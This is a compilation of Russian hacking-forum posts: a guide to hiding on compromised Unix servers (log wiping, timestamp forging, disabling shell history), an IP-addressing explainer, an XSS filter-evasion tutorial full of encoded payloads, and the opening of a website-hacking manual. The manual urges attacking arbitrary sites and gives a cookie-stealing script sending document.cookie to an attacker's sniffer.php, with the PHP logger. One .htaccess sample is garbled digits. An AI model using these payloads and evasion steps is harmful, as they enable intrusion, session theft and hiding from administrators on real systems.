Но ведь ломают! Ломают и удерживаются незамеченными на серверах месяцами, а то и годами. И все благодаря элементарной маскировке. Достигается она, как правило, соблюдением нескольких неписаных законов, которые знает каждый уважающий себя хакер. Нарушив одно из таких правил, можно стать уязвимым для админов, которые своевременно обнаружат и нейтрализуют найденного взломщика. При этом последствия для нарушителя могут быть весьма плачевными.

Тебе интересно, о каких нарушениях идет речь? В этом материале я кратко изложу десять ошибок хакера, которые, на мой взгляд, являются самыми популярными. Ошибки актуальны в основном для unix-like систем, поэтому любителей Windows попрошу не питать особых надежд.

1. Чистка логов
Как ни странно, мало кто любит чистить логи во взломанной системе. А ведь именно по логам админ обнаруживает вторжение. Давай рассмотрим механизм создания логов в unix-like операционке.

Как правило, служебная информация скидывается в файл при помощи функции syslog(). Эта функция напрямую работает с демоном syslogd, либо с его альтернативой (syslog-ng, например). У этого демона есть свой конфигурационный файл (по умолчанию /etc/syslog.conf), в котором подробно указывается местонахождение log-файлов и критерии для того или иного лога, чтобы корректно отделить мух от котлет. Хакер часто забывает, что админ может сменить названия дефолтовых журналов, перенаправив /var/log/secure, к примеру, в /usr/admin/secure. К тому же логи могут писаться в консоль конкретному юзеру, что сильно затрудняет положение хакера.

Чистка таких файлов должна осуществляться с особой осторожностью: проверенными логвайперами, либо руками (идеальный вариант). Я лично встречал такие логвайперы, после применения которых журналирование данных останавливалось. Думаю, добропорядочный админ при таком раскладе быстро заметит неполадки в системе.

2. Изменение даты на файлах
Дата на файлах - уязвимое место хакера. Именно по дате программы-следилки за системой определяют установку руткита, либо изменение системных файлов. Сменить дату на файле позволяет команда touch с параметром -t, после которого идет дата в формате: МесяцДеньЧасМинутаГод. Взломщики очень часто забывают менять дату обратно на старую после правки конфа либо перезаписи бинарника. Админские утилиты быстро определяют изменения в системе и посылают подробный отчет администратору на мыло.

3. История команд
Незаменимый атрибут любого шелла - хранение истории команд, набранных пользователем. Это сделано, чтобы иметь возможность повтора набранной когда-то команды. Файл с историей команд в первую очередь изучается хакером при удачном взломе системы, чтобы получить первоначальную информацию о деятельности админа, либо вытянуть пароли из консольных программ.

Но если посмотреть с другой стороны, то и админ может быть параноиком, регулярно изучающим свой собственный history-файл. И если хакер порядочно наследил в системе, оставив таким образом историю установки руткитов или DoS'еров, реакция администратора непредсказуема. Поэтому каждый взломщик должен своевременно заметать свои следы.

Местонахождение history-файла можно узнать через переменную среды HISTFILE, просмотрев ее консольной командой echo $HISTFILE. Соответственно после команды export HISTFILE=/dev/null запись команд в файл прекратится. Внимание! Данный прием работает только на время текущей сессии, поэтому хакеру придется выполнять команду каждый раз при появлении в системе.

4. Заражение системы руткитами
Как это ни парадоксально, но установка руткитов может запросто выдать хакера. Во-первых, заменяя системные файлы, он, как правило, совершает ошибку №2, так как устанавливать первоначальную дату на туеву хучу бинарников мягко говоря долго и неспортивно. Во-вторых, если админ установил новую версию пакета (binutils, например), то установка старой поверх системной ни к чему хорошему не приведет. Более того, нарушителя могут выдать ключи к командам, задаваемые alias'ом. К примеру, старая версия /bin/ls не понимает ключа --colors, а многие руткиты содержат именно старые версии. Иными словами, установив старый руткит на новую систему, хакер автоматически подписывает себе смертный приговор.

5. Установка своего софта
Взломав систему, нарушитель нередко ставит на нее свой софт, к примеру, socks или nmap, что вполне логично - ему была необходима подопытная система, и он ее получил. Но даже если процессы взломщика скрываются, то в этом случае админ может обнаружить открытый 1080-ый порт в системе. Тогда он быстро догадается, в чем дело, и тем самым раскроет маскировку хакера.

На самом деле, после взлома нарушитель анализирует деятельность админа и делает выводы о степени запущенности сервера. Но устанавливать свои программы в корневые директории все же не стоит. Чтобы этого избежать, хакер должен создать свой отдельный скрытый каталог и ставить весь боевой софт в него. Это достигается командой ./configure --prefix=/path/to/hidden/xakep_dir при установке пакетов.

6. Сканирование со взломанной системы
Самая распространенная ошибка среди всех перечисленных. Ведь скан с порутанного сервера никогда не приводит ни к чему хорошему. Смотри сам: взломщик сканирует подсеть nmap'ом или другим доступным сканером. После чего законопослушный админ просканенной сетки может написать жалобу в abuse компании, с которой производился скан, с высылкой всех логов, доказывающих факт вторжения. Служба безопасности, закрепленная за компанией, в свою очередь приходит к выводу, что их сервер поломали, и стучат по голове администратору. Ясно, что после этого инцидента хакеру на сервере не жить.

Конечно, эта ситуация далеко не типична. Из-за инертности наших доблестных админов сканирование часто сходит хакеру с рук. Но имей в виду, что он может нажить себе лишние проблемы, ведя активную деятельность со взломанного сервера.

7. Изменение рулесов фаервола
Фаервол - личное дело админа. И если он его установил, подразумевается, что он знает все его правила как свои пять пальцев. Если же взломщик будет их настраивать на свой вкус, то рано или поздно админ пресечет эти деяния. Исключение могут составлять жуткие нагромождения правил, составленные явно не администратором системы. Добавление неприметной записи в эту гремучую смесь не вызовет катастрофы.

Если же фаервол содержит несколько удобочитаемых правил, и, судя по HISTFILE, администратор регулярно следит за ними, то ничего не остается, кроме как подчиниться им, либо изменить исходники фаервола (для C гуру). Это, кстати, самый классный вариант.

8. Добавление новых пользователей
Довольно типичная ситуация: взломав систему, хакер делится впечатлениями о взломе в IRC или ICQ. Его лучшие друзья тут же начинают выпрашивать шелл для личных нужд. Поразмыслив немного, взломщик добавляет пользователя в систему, успокаивая себя, мол, шелл-то не рутовый, чем он может мне помешать. На следующий день администратор получает утренний отчет об аномальных происшествиях в системе и находит в нем интересную строку, например:

New users:
xakep:x:31337:31337:Xakep user:/home/xakep:/bin/bash

Теперь можно попрощаться с root-аккаунтом на взломанной тачке.

Чтобы такого не происходило, в системе не должно быть новых пользователей со стороны взломщика. Лучше всего проверить на прочность уже существующие учетные записи и пользоваться ими.

9. Допуск в систему посторонних лиц
Эта ошибка похожа на предыдущую, но есть одно отличие. Нередко у хакера просят доступ к серверу через его же собственные бэкдоры. После предоставления такого доступа можно сразу попрощаться с сервером. Все люди разные, и постороннее лицо может легко нарушить все вышеописанные правила за один сеанс работы, тем самым нарушив твою маскировку в системе.

Грамотный хакер никогда не создает подобных ситуаций. Более того, он не треплется о взломе где попало, всегда ставя собственную безопасность на первое место. Нарушение данного правила возможно лишь в случае, если ты убежден, что после предоставления доступа у тебя не возникнет лишних проблем.

10. Выбор профессии хакера
Да, ты не ослышался! Хакер - как сапер, первый раз ошибается еще при выборе своей профессии. Каждый взлом может оказаться для него фатальным, и сам он это осознает. Но не может с этим смириться, считая взлом экстремальным видом спорта. Если ты все еще раздумываешь, "быть или не быть хакером", то я дам тебе совет. НЕТ! Быть хакером уже не так модно, да к тому же опасно. Так что займись лучше чем-нибудь другим, например, продажей школьных выпускных сочинений по русскому языку через интернет .

Вот, собственно, и все оплошности, приводящие к печальным последствиям. Но, еще раз повторюсь, все эти ошибки актуальны лишь в системе, за штурвалом которой сидит добросовестный админ, заслуженно получающий свою зарплату. В запущенных серверах, где админ мониторит систему по пьяни и только по праздникам, можно творить что угодно - хуже все равно не будет.

Этот материал призван показать типичные случаи, когда хакеры выдают себя во взломанной системе. Не следует считать это руководством к действию. Прежде чем совершить непоправимое, прочитай еще раз 10 пункт. В мире ведь еще столько интересного
(с)Mak7v be Grabba
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Полный рассказ про IP

IP-адрес (aй-пи адрес, сокращение от англ. Internet Protocol Address) — уникальный идентификатор (адрес) устройства (обычно компьютера), подключённого к локальной сети и (или) интернету.

IP-адрес представляет собой 32-битовое (по версии IPv4) или 128-битовое (по версии IPv6) двоичное число. Удобной формой записи IP-адреса (IPv4) является запись в виде четырёх десятичных чисел (от 0 до 255), разделённых точками, например, 192.168.0.1. (или 128.10.2.30 — традиционная десятичная форма представления адреса, а 10000000 00001010 00000010 00011110 — двоичная форма представления этого же адреса).

IP-адреса представляют собой основной тип адресов, на основании которых сетевой уровень протокола IP передаёт пакеты между сетями. IP-адрес назначается администратором во время конфигурирования компьютеров и маршрутизаторов.

IP-адрес состоит из двух частей: номера сети и номера узла. В случае изолированной сети её адрес может быть выбран администратором из специально зарезервированных для таких сетей блоков адресов (192.168.0.0/16, 172.16.0.0/12 или 10.0.0.0/8). Если же сеть должна работать как составная часть Интернета, то адрес сети выдаётся провайдером либо pегиональным интернет-регистратором (Regional Internet Registry, RIR). Согласно [1] существует пять RIR: ARIN, обслуживающий Северную Америку; APNIC, обслуживающий страны Юго-Восточной Азии; AfriNIC, обслуживающий страны Африки; LACNIC, обслуживающий страны Южной Америки и бассейна Карибского моря; и RIPE NCC, обслуживающий Европу, Центральную Азию, Ближний Восток. Региональные регистраторы получают номера автономных систем и большие блоки адресов у IANA, а затем выдают номера автономных систем и блоки адресов меньшего размера локальным интернет-регистраторам (Local Internet Registries, LIR), обычно являющимся крупными провайдерами.

Номер узла в протоколе IP назначается независимо от локального адреса узла. Маршрутизатор по определению входит сразу в несколько сетей. Поэтому каждый порт маршрутизатора имеет собственный IP-адрес. Конечный узел также может входить в несколько IP-сетей. В этом случае компьютер должен иметь несколько IP-адресов, по числу сетевых связей. Таким образом, IP-адрес характеризует не отдельный компьютер или маршрутизатор, а одно сетевое соединение.

Бесклассовая адресация

Со второй половины 90-х годов XX века классовая адресация повсеместно вытеснена бесклассовой адресацией, при которой количество адресов в сети определяется только и исключительно маской подсети.

CIDR-адреса vs. INET-адреса
Иногда встречается запись IP-адресов вида 10.96.0.0/11. Данный вид записи заменяет собой указание диапазона IP-адресов. Число после косой черты означает количество единичных разрядов в маске подсети. Для приведённого примера маска подсети будет иметь двоичный вид 11111111 11100000 00000000 00000000 или то же самое в десятичном виде: 255.224.0.0. 11 разрядов IP-адреса отводятся под номер сети, а остальные 32 − 11 = 21 разрядов полного адреса — под локальный адрес в этой сети. Итого, 10.96.0.0/11 означает диапазон адресов от 10.96.0.0 до 10.127.255.255
Значение маски
1 2 3 4
1 128 0 0 0
2 192 0 0 0
3 224 0 0 0
4 240 0 0 0
5 248 0 0 0
6 252 0 0 0
7 254 0 0 0
8 255 0 0 0
9 255 128 0 0

32 255 255 255 255

Запись IP-адресов с указанием через слэш маски подсети переменной длины также называют CIDR-адресом в противоположность обычной записи без указания маски, в операционных системах типа UNIX также именуемой INET-адресом.

Особые IP-адреса

В протоколе IP существует несколько соглашений об особой интерпретации IP-адресов:
* eсли весь IP-адрес состоит только из двоичных нулей, то он обозначает адрес того узла, который сгенерировал этот пакет; этот режим используется только в некоторых сообщениях ICMP;
* eсли в поле номера сети стоят только нули, то по умолчанию считается, что узел назначения принадлежит той же самой сети, что и узел, который отправил пакет;
* eсли все двоичные разряды IP-адреса равны 1, то пакет с таким адресом назначения должен рассылаться всем узлам, находящимся в той же сети, что и источник этого пакета. Такая рассылка называется ограниченным широковещательным сообщением (limited broadcast);
* eсли в поле номера узла назначения стоят только единицы, то пакет, имеющий такой адрес, рассылается всем узлам сети с заданным номером сети. Например, в сети 192.190.21.0 с маской 255.255.255.0 пакет с адресом 192.190.21.255 доставляется всем узлам этой сети. Такая рассылка называется широковещательным сообщением (broadcast).

Динамические IP-адреса

IP-адрес называют динамическим, если он назначается автоматически при подключении устройства к сети и используется в течение ограниченного промежутка времени, как правило, до завершения сеанса подключения.

Для получения IP-адреса клиент может использовать один из следующих протоколов:

* DHCP (RFC 2131) — наиболее распространённый протокол настройки сетевых параметров.
* BOOTP (RFC 951) — простой протокол настройки сетевого адреса, обычно используется для бездисковых станций.
* IPCP (RFC 1332) в рамках протокола PPP (RFC 1661).
* Zeroconf (RFC 3927) — протокол настройки сетевого адреса, определения имени, поиск служб.

Интересно

* В ОС Windows свой IP-адрес можно узнать, набрав ipconfig в командной строке.
* В ОС Unix свой IP-адрес можно узнать, набрав ifconfig в командной строке.
* IP-адрес, соответствующий доменному имени, можно узнать с помошью команды: ping hostname.tld или nslookup hostname.tld

(с)ICQ_BRUTER in grabberz
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
[XSS] Приёмы обхода фильтров

[XSS] Приёмы обхода фильтров.
[Инпут]
Здрасте. Данное писание посвящено обзору некоторых из способов обхода xss-фильтров. Уровень сложности материала ориентирован, в среднем, на пользователя имеющего понятие об XSS-атаках, но в то же время имеються доступные краткие объяснения для менее искушенного в этом плане читателя. Это моя первая статья, которая в силу моей неопытности в писательском деле, может иметь некоторые изъяны, так что держите свои помидорные пулеметы в боевой готовности.
Так же хотелось бы напомнить, что сами XSS атаки имеют намного больший потенциал нежели кража cookies. С помощью XSS можно выполнять теже действия, что и администратор сайта, главное знать как правильно реализовать атаку. Но перед тем, как что-то делать, нужно убедиться в надежности, а в данном случае, в надежности xss-векторов перед системами фильтрации. Краткое содержание данного писания:

[1] - Спасение кавычек.
[2] - Использование атрибута.
[3] - Добавление угловой скобки.
[4] - Использование тега </TITLE>.
[5] - Шифрование Base64.
[6] - Использование Flash.
[7] - Кодировка UTF-7.
[8] - Мультимедиа контейнеры.
[9] - Озэръ.

[1]-[Спасение кавычек]
Часто встречается ситуация когда фильтр экранирует либо удаляет двойную (") и одинарную (') кавычки. В такой ситуации следует воспользоваться String.fromCharCode(), или unescape(), которые переводят все символы в цифровой код. Разница между ними, лишь, в использовании систем исчисления: String.fromCharCode() использует DEC-значения символов, а unescape() использует HEX-значения.

Пример:
Код:
alert(String.fromCharCode(120,97,107,110,101,116,46,114,117))
, где цифры это десятичные коды(DEC) символов.
Пример:

Код:
alert(unescape(/%78%61%6b%6e%65%74%2e%72%75/.source))
, где "/%78%61%6b%6e%65%74%2e%72%75/" - это шеснадцатиричные коды (HEX) символов.

Ещё одним методом, является использование, в качестве альтернативы кавычкам, конструкции / /.source, но можно и без использования .source

Пример:
Код:
<SCRIPT>alert(/message/.source)</SCRIPT>
Пример:
Код:
<SCRIPT>alert(/message/)</SCRIPT>
[2]-[Использование атрибута]
Некоторые из атрибутов различных тегов имеют интересные свойства, благодаря которым вы можете использовать кодирование содержимого XSS-вектора. Кодировки, которые можно использовать, такие как, HTML Entities DEC Encode(имеет вид: &#XXX; ), Long HTML Entities DEC Encode(имеет вид: &#(0000)XXX), HTML Entities HEX(имеет вид: &#xXX),(X-цифра). LongHTMLEntities отличается от HTML Entities тем, что не использует точку с запятой для разделения значений символов, и использует дополнительные четыре цифры слева, что даёт возможность обойти фильтрацию &#XXX;-подобных значений, т.к. будет задействовано 7 цифр вместо 3-х.

Пример (javascript:alert('xaknet.ru')) в HTML Entities DEC:
Знак "!" перед применением удалить

Код:
<IMG SRC=&!#106;&!#97;&!#118;&!#97;&!#115;&!#99;&!#114;&!#105;&!#112;&!#116;&!#58;&!#97;&!#108;&!#101;&!#114;&!#116;&!#40;&!#39;&!#120;&!#97;&!#107;&!#110;&!#101;&!#116;&!#46;&!#114;&!#117;&!#39;&!#41;>
Пример (javascript:alert('xaknet.ru')) в Long HTML Entities DEC:
Знак "!" перед применением удалить

Код:
<IMG SRC=&!#0000106a&!#0000118&!#0000097&!#0000115&!#0000099&!#0000114&!#0000105&!#0000112&!#0000116&!#0000058&!#0000097&!#0000108&!#0000101&!#0000114&!#0000116&!#0000040&!#0000039&!#0000120&!#000097&!#0000107&!#0000110&!#0000101&!#0000116&!#0000046&!#0000114&!#0000117&!#0000039&!#0000041>
Пример (javascript:alert('xaknet.ru')) в HTML Entities HEX:
Знак "!" перед применением удалить

Код:
<IMG SRC=&!#x6A;&!#x61;&!#x76;&!#x61;&!#x73;&!#x63;&!#x72;&!#x69;&!#x70;&!#x74;&!#x3A;&!#x61;&!#x6C;&!#x65;&!#x72;&!#x74;&!#x28;&!#x27;&!#x78;&!#x61;&!#x6B;&!#x6E;&!#x65;&!#x74;&!#x2E;&!#x72;&!#x75;&!#x27;&!#x29;>
Использование атрибутов имеет такую особенность, благодаря которой можно использовать табуляцию, которая будет разделять вектор на части, и это даст вам ещё одну возможность обойти фильтрацию по названиям функций и методов JavaScript. Схожим методом является изменение регистра букв, но существенным недостатком данного способа является отсутствие возможности изменять регистр букв в названии метода.

Пример:

Код:
<IMG SRC="Ja va sc ri pt : al er t( 'me ssa ge' )">
- такая конструкция работает.
Пример:
Код:
<IMG SRC="JaVaScRiPt:aLeRt('message')">
- такая конструкция работать не будет из-за aLeRt(), вызвавшего ошибку.

Так же можно комбинированно использовать эти два способа, но главное соблюдать целостности HEX и DEC значений закодированных символов, т.е. их не стоит разрывать табуляцией, т.к. конструкция не будет работать.

Пример HTML Entities DEC:
Знак "!" перед применением удалить
Код:
<IMG SRC=""Ja &!#118; as c &!#114; i pt :a &!#108; ert &!#40; 'm e s s a g e' &!#41 ;">
Всех атрибутов в которых реализована такая возможность я не нашел, да и не искал, т.к. временами случаются приступы вселенской лени, но как мне кажется, это атрибуты, которые имеют характер указателя на объект, либо атрибуты тегов указывающих на объект (страница, рисунок, аплет, и т.д.).

[3]-[Добавление угловой скобки]
Данный способ позволяет обойти фильтр, проверяющий сразу на присутствие соответствия открывающих и закрывающих угловых скобок, после обнаружения, которых, считает все, что в них находиться тегом и вырезает, либо видоизменяет до состояния неработоспособности. Избежать вмешательства фильтра можно путём добавления перед открывающим тегом второй открывающей угловой скобки. Особенность данного способа является обязательное наличие знака комментария //, который ставиться перед закрывающим тегом, дабы сделать вид прокомментированной посторонней закрывающей скобки, что бы не нарушить синтаксис и не вызвать ошибку.

Пример:

Код:
<<SCRIPT>alert('message')//<</SCRIPT>
Пример:

Код:
<<IMG SRC=javascript:alert('message')//>
[4]-[Использование тега </TITLE>]
Так как тег <TITLE>, в большинстве случаев, находится в начале кода страницы, вы, путём добавления закрывающего </TITLE> можете добиться вырезания всего кода страницы между открывающим и закрывающим тегами TITLE, что может добавить шансы на срабатывание скрипта, который должен выполниться сразу после </TITLE>, если использовать данную конструкцию:


Код:
</TITLE><SCRIPT>alert("message");</SCRIPT>
- закрывает все, что находиться между <TITLE> страницы и векторным (вводимым вами) </TITLE>, после чего выполняет alert().

[5]-[Шифрование алгоритмом base64]
Также является хорошим способом, если фильтрация направлена на список названий тегов или JS-кода.

Пример:
Код:
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgneGFrbmV0LnJ1Jyk8L3NjcmlwdD4=">
PHNjcmlwdD5hbGVydCgneGFrbmV0LnJ1Jyk8L3NjcmlwdD4= - это зашифрованный вектор <script>alert(xaknet.ru)</script>.

[6]-[Использование Flash.]
В качестве обфускации вектора, можно использовать ActionScript через Flash, путём использования переменных и присваивания им значений, которые являются частями xss-кода.

Пример:

Код:
a="get";
b="URL(\"";
c="javascript:";
d="alert('message');\")";
eval(a+b+c+d);
[7]-[Использование UTF-7]
Заключается данный способ в изменении кодировки символов xss-вектора на UTF-7. Это может сработать в тех случаях, когда в странице не указывается кодировка, и атакующий может заставить страницу испольвоть UTF-7, тем самым, обойти фильтрацию, изменив некоторые из символов UTF-8 на UTF-7.

Пример:
Код:
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"></HEAD>+ADw-SCRIPT+AD4-alert('message');+ADw-/SCRIPT+AD4-
В примере угловые кавычки представлены в кодировке UTF-7.

[8]-[Мультимедиа контейнеры]
Данный способ направлен на использование мультимедийных файлов (видео, картинки) в качестве "контейнеров" для xss-векторов. Осуществить данную атаку можно, создав текстовый файл, в который поместится вектор, и конвертировать этот файл в необходимый нам формат видео/изобр., после чего залить на сервер и обратиться к нему через браузер. Главной особенностью является обязательное использование тега <script></script>, т.к. другие теги не распознаються IE, при открытии видео и изображений. Существенным недостатком является и то, что эта ататка легко обнаруживается фильтрами по заголовкам мультимедиа файлов. Для обхода таких фильтраций, воспользуйтесь изображением в формате PNG, открыв её через текстовый редактор, и дописав в конец свой скрипт. Важной особенностью при этом является соблюдение небольшого размера файла. Способ с видео форматами, к сожалению, не нашел.

Пример проведения атаки через видео-файл(mov) by ErrNick - http://video.xaknet.ru/index.php?video&view=79

[9]-[Озэръ]
Тут я привёл некоторые из альтернативных вариантов проведения xss-атак:

"><img src="x:x" onerror="alert(0)"> - вызывается ошибка в атрибуте SRC=, из-за чего срабатывает alert(). x:x - это разные числа.
with(document)alert(cookie) - эквивалентен alert(document.cookie).
prompt() - эквивалентен alert().

Внимание: некоторые из представленных способов работоспособны не во всех браузерах.

[Оутпут]
Как видно, это не все возможные способы обхода фильтрации, но основные их обличия я попытался описать. Мне хотелось бы увидеть только здравую и адекватную критику с вашей стороны...

Зэ энд, товарищи! Спасибо за этеншен.

Большое cпасибо ErrNick'у за то, что прочел и дал свою оценку данному материалу, тем самым избавив меня от переживаний о качестве данного писания.

Источники информации использованой при написании:

-Крупицы знаний и доводов из моего мозга.
-The Cheat Sheet – Robert "RSnake" Hansen. Так же, в низу странички находятся кодировщики кода.
-Our Favorite XSS Filters/IDS and how to Attack Them - BlackHat 2009
-x3k.ru - онлайн-сервис, включающий в себя программы для кодирования/декодирования.
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
МЕГА МАНУАЛ ПО ХЕКУ САЙТОВ by Krist_ALL

Что тут такое:
Данный мануал написан дабы покончить с тупыми вопросами по всему инету аля "подставил кавычку,вылезла ошибка, что делать дальше?". Мануал охватывает очень широкий спектр тем о взломе. Но прежде чем мы преступим, нужно создать подготовиться, обзавестись нужные инструментами и базовыми знаниями. И глупо думать, что прочитав этот манул, ты станешь крутым хакером. Это не так. Личный опыт - вот чего нет во всех мануалах. Сухая теория. Опыт бесценное знание. Постараюсь не писать сухую теорию, а чтобы максимально все было приближенно к реальным случаям. Описанные здесь темы раскрыты если не на 100 процентов, то на 99 точно) И хватит уже подставлять кавычки и дальше не знать что делать! Вперед читать мануал. От тебя потребуется только знание основ php,sql,javascript,html,linux и логика. ВСЁ!


Для лучшего усвоения материалы, тебе понадобиться установить у себя на компьютере веб сервер. Я не советовал бы денвер, есть прекрасная альтернатива ему- AppServer - AppServNetwork. А если ты хочешь все установить сам и не пользоваться сборками, то вот подробный мануал - Настройка PHP5 + Apache 2.2 + MySQL 5.1.41 + phpMyAdmin 3.2.3 - PHP для начинающих - CyberForum.ru Также хочу дать ссылку на замечательные уроки по пхп, лучше не встречал - PHP.SU - ????? PHP (?? ?????????? ?????? PHP.SU)


И последний совет - заботься о своей безопасности, юзай прокси, впн, дедики, а лучше все вместе. Если это для тебя трудно и сложно, то самое простое решение - это PProxy - http://forum.antichat.ru/thread93318.htm (Серверную часть заливай на шелл взломанного сайта а не на свой хотсинг.) Вот собственно и все.) Поехали!

Респекты всем участникам данного форума) :men:

При написание данного мануала, была использована иформация со следющих сайтов:
Wikipedia
Antichat
SecurityLab
Xakep.ru
Exploit.in
Google.ru
Cyberforum.ru
Nulled.ws


Содержание:
1. INTRO... [YES]
2. XSS
3. SQL INJECTION[ Введение ] [YES]
3.1 SQL INJECTION[ MySQL ]
3.2 SQL INJECTION[ MsSQL ]
3.3 SQL INJECTION[ Oracle ]
4. PHP(PERL) INJECTION [YES]
5. DIRS [YES]
6. AdminCenter [YES]
7. FORUM [YES]
8. WEB SHELL [YES]
9. BIND / BACKCONNECT
10. GET ROOT
11. CLEAR LOGS
12. PATHS [YES]
13. TRICKS
14. PASWORDS [YES]
15. OTHER [YES]
16. TOOLS [YES]
17. LINKS [YES]
18. GOOGLE HACK [YES]
19. ADDITION
20. OUTRO [YES]


Многое не вышло сделать не потому что я не знаю а потому что не охото делать)


ДЕЛИТЕСЬ СВОИМИ ЗАНИНЯМИ!

_________________

1. INTRO
__________________________________________________ ____

Немного философии:-):
1. Мастер тот, кто ломает то что хочет, а не то что получается. Это следует хорошо уяснить. Возьмите наугад любой сайт и попробуйте его взломать. Если сразу не получиться, нужно пробовать ВСЕ методы. Ломая то что получается и бросая если сразу не получилось найти к примеру sql injection , ничего достичь нельзя.
2. Многие пугаются популярности сайта или шикарного дизайна. Это все ничто. Это оболочка, и никакой роли не играет.
3. Баги бывают совершенно не обычные и найти их можно совершенно случайно. Тупой админ может поставить под угрозу самый надежный двиг. Человеческий фактор.
4. Дефейс это плохо) Дефейс делают тогда когда больше ничего нельзя сделать..Что может быть проще исправть главную страницу сайта? А ведь можно сделать еще много чего интересного имея шелл и зачем палиться.

____________________

2. XSS
__________________________________________________ ____

Что такое XSS:
XSS (англ. Сross Site Sсriрting — «межсайтовый скриптинг») — тип уязвимости интерактивных информационных систем в вебе. XSS возникает, когда в генерируемые сервером страницы по какой-то причине попадают пользовательские скрипты. То есть страница предстаёт перед пользователем с внедренным javascriptом, который выполниться на стороне ПОЛЬЗОВАТЕЛЯ, а не сайта. Но это не значит, что цель может быть только одна - сотворить что-то с пользователем. Возможности у javascript"а большие..

Итак основная суть:
1. Пользователь заходит на страницу.
2. На странице присутствует javascript, который делает свое грязное дело.
3. Javascript выполняется на сторон пользователя. Что это значит?
Это значит, что javascript может например узнать разрешение монитора пользвателя, или украсть cookie, массу чего может, но не может производить никак действий с самим сайтов, тобишь стереть страницу, прочитать конфиг итд.

Что конкретно можно сделать, внедрив javascript?
1) Кража Cookies.
2) SEO + DoS.
3) Эксплоиты
4) Троянизация скриптов.
5) Смена личной информации пользователя.
6) Фейки.
7) Дефейсы.
8) XSS - черви.



Теперь обо всем по порядку.

Сross Site Sсriрting - а пишется XSS, почему?
Чтобы не путать Сross Site Sсriрting c Cascading Style Sheets, первое решили называть XSS.

Какие бывают XSS?
Бывают пассивные , бывают активные.
Пассивные - когда код javascript нигде не сохранен на сайте, и мы кидаем ссылку жертве с javascript коом в url
или мы вставляем в текстовое поле "><script>alert(1)</script> , и жмем например зарегистрироваться, если какое - то поле было неверно заполнено, то перед нами снова будет форма ввода данных, но у одного из полей код будет таким:
<input name=age value=""><script>alert(1)</script>">
По сути это бесполезно, но если данные в поле вставляются из GET переменной (http://....../index.php?age=1&name=g) то можно дать ссылку жертве вида
http://......../index.php?name="><script>alert(1)</script>

Если же данные вставляются не в текстовое поле а просто выводятся на страницу как заголовок статьи например (очень часто как поисковое слово), то ссылка будет вот такой http://......../index.php?name=<script>alert(1)</script>
Жертва перейдет по ссылке и текст из переменной name вставиться в страницу, далее выполниться javascript код <script>alert(1)</script> и появиться собщение с текстом 1. Далее я расскажу что можно сделать кроме как выводить сообщения.

Активные xss это когда мы можем сохранить javascript код на сайте и дать жертве просто ссылку http://aaa.ru/profile.php?id=5 в которой нет javascript кода. Когда жертва перейдет по ссылке на странице сработает javascript код. Таки xss очень ценятся. Сохранить код можно например в одном из полей профиля (ник/имя/образование итд), в сообщение форума.


Теперь поговорим более подробно о том, что можно натворить:
Кража COOKIES
Теореия: На страницу внедряем javascript код, который отсылает cookies пользователя нам, а мы подменив их своими, заходим на сайт, и сайт нас определяет пропускает не прося пароля.

Практика: Вариантов кода может быть масса. Этот код выполняется во всех браузерах
Код:
<script>img=new Image();img.src="http:/nashsajt/sniffer.php?"+document.cookie;</script>

Данный код создает картинку. В атрибуте адреса указывает адрес к нашему пхп скрипту. И передает в качестве параметра куки пользователя.
Это будет выглядеть вот так
Код:
http://nashsajt/sniffer.php?sess=123123123123

Скрипт с именем sniffer.php словит куки, которые ему передал javascript и сохранит их в файле например.
Самый простой сниффер:
Код:
<?php
$snif = $_SERVER['QUERY_STRING']; // переданные параметру снифферу
$file = "file.txt"; // файл в который будут записаны данные
$fp = fopen($file,"a+");
fwrite($fp,"\n".$snif);
fclose($fp);
?>

Этот php код запишет в файл строку , которая после имени скрипта http://.........../a.php?lalalalaala

Можно не писать img.src="http:/nashsajt/sniffer.php?" а написать img.src="http:/nashsajt/sniffer.jpg? " тогда нам нужно чтобы на нашем сайте файлы с расширением jpg исполнялись как php код. Для этого сздаем файл .htaccess с таким текстом
Код:
99999999999999999999999999


Часто Xss уязвимость присутствует в форумных двжках. Поститься ядовитое сообшение, админ его читает, куки прилетают взломщику, меняет свои куки на админские, идет на форум и он админ.

НЕДОДЕЛАНО

_________________

3. SQL INJECTION [ Введение ]
__________________________________________________ ____


SQL - язык запросов к базе данных.
injection - внедрение, инекция


Язык SQL (Structured Query Language - структурированный язык запросов) представляет собой стандартный высокоуровневый язык описания данных и манипулирования ими в системах управления базами данных (СУБД), построенных на основе реляционной модели данных. В 1969 г. д-р Эдгар Ф. Кодд опубликовал в серии исследовательских отчетов IBM сообщение под названием Derivability, Redundancy, and Consistency of Relation Stored in Large Data Banks. Там описывался подход к структурированию баз данных, основанный на использовании связных таблиц, который значительно отличался от принятого в то время подхода с плоскими файлами. Это сообщение имело пометку "для ограниченного распространения" и поэтому не получило широкой известности. Кодд переработал свои концепции и в 1970 г. Опубликовал их в статье под названием A Relational Model of Data for Large Shared Data Banks в журнале ACM (Association of Computer Machinery). Реляционная модель, описанная Коддом. В 1974 г. Была использована в прототипе реляционной системы управления базами данных (РСУБД), названной System R. Описывая системный язык запросов в ноябрьском номере IBM Journal of R & D за 1976 г., корпорация IBM использовала для него название Structured English QUEry Language ( SEQUEL, язык структурированных английских запросов).
В ходе эволюции языка название изменилось на Structured Query Language ( SQL, язык структурированных запросов, произноситься как сиквел ( sequel ) или " S - Q - L "). Первая коммерческая версия SQL была выпущена в 1979 г. Корпорацией Oracle (в то время называвшейся Relational Software Inc.). В 1986г. К работе подключился Американский национальный институт стандартов ( ANSI ), опубликовавший официальный стандарт SQL с кодовым названием ANSI X 3.135-1986. В следующем году этот стандарт был опубликован Международной организацией по стандартизации ( ISO ) как ISO 9075-1987. Спецификация SQL дважды расширялась - в 1992 и 1999 г. Текущая спецификация состоит из пяти частей, имеющих название ANSI / ISO / IEC 9051-1-1999-9051-5-1999. SQL фактически стал стандартным языком для выполнения запросов к базам данных. Каждый производитель систем управления базами данных слегка модифицирует его, чтобы приспособить к своим потребностям, но ядро SQL по существу остается неизменным. От этого выигрывают пользователи и разработчики баз данных, поскольку усилия, потраченные на изучение SQL, будут приносить свои плоды в течении долгих лет, при смене версий программы и даже при переходе на другие продукты. 